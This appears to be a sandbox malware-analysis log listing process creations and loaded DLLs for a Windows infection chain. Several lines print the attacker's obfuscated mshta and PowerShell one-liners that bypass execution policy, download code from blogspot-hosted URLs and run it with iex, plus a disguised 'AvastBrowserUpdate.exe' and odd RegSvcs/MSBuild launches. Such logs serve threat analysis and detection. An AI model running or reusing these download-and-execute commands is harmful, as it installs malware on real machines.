Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 772
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 892
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\SysWOW64\SettingSyncHost.exe "C:\Windows\System32\SettingSyncHost.exe"
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4112 -s 56
Source: unknown | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7
Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr446F.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/42bc8076"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2504,i,7433291875497265033,6303917918567854472,262144 --variations-seed-version --mojo-platform-channel-handle=2628 /prefetch:3
Source: unknown | Process created: C:\Windows\System32\mshta.exe "C:\Windows\system32\mshta.exe" "javascript:var fll = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
Source: unknown | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\128.0.2739.63\elevation_service.exe"
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr524B.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/b0766183"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1628,i,15598181154832850491,9117469408654283260,262144 --variations-seed-version --mojo-platform-channel-handle=2364 /prefetch:3
Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\system32\mshta.EXE "javascript:var lhn = ['Shell.Application', 'SHELLEXECUTE', 'powershell', '-ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;', '', 'open', 0], iax = ['Scripting.FileSystemObject', 'DeleteFile', 'WScript.ScriptFullName'], ijs = new ActiveXObject(lhn[0]), ckc = ijs[lhn[1]](lhn[2], lhn[3], lhn[4], lhn[5], lhn[6]);close(); new ActiveXObject(iax[0])[iax[1]](WScript[iax[2]]);"
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe | Process created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe C:\Users\user\AppData\Roaming\Avlogo\AvastBrowserUpdate.exe
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;& ('{1}{0}' -f 'ex', 'I') $(irm https://marchlkalanew6.blogspot.com/lundchikha.doc);Start-Sleep -Seconds 6;Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\SettingSyncHost.exe "C:\Windows\System32\SettingSyncHost.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 772Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 892Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 792Jump to behavior
                      Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr446F.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/42bc8076"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr524B.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/92db0035/b0766183"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmlaunch.exe "C:\Program Files\Windows Media Player\wmlaunch.exe"
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=2504,i,7433291875497265033,6303917918567854472,262144 --variations-seed-version --mojo-platform-channel-handle=2628 /prefetch:3
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --field-trial-handle=1628,i,15598181154832850491,9117469408654283260,262144 --variations-seed-version --mojo-platform-channel-handle=2364 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknown
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;(irm https://kalacpamarchclean.blogspot.com/chig.doc) | . iex;Start-Sleep -Seconds 7;
                      Source: C:\Program Files\Windows Media Player\wmlaunch.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                      Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: edgegdi.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: jscript.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: pcacli.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: sfc_os.dll
                      Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edgegdi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: xmllite.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: edgegdi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v3.5\MSBuild.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: edgegdi.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: version.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: devobj.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: drprov.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: winsta.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: ntlanman.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: davclnt.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: davhlpr.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe | Section loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe | Section loaded: policymanager.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe | Section loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe | Section loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe | Section loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe | Section loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe | Section loaded: msvcp110_win.dll
                      Source: C:\Windows\SysWOW64\SettingSyncHost.exe | Section loaded: edgegdi.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exe | Section loaded: iertutil.dll
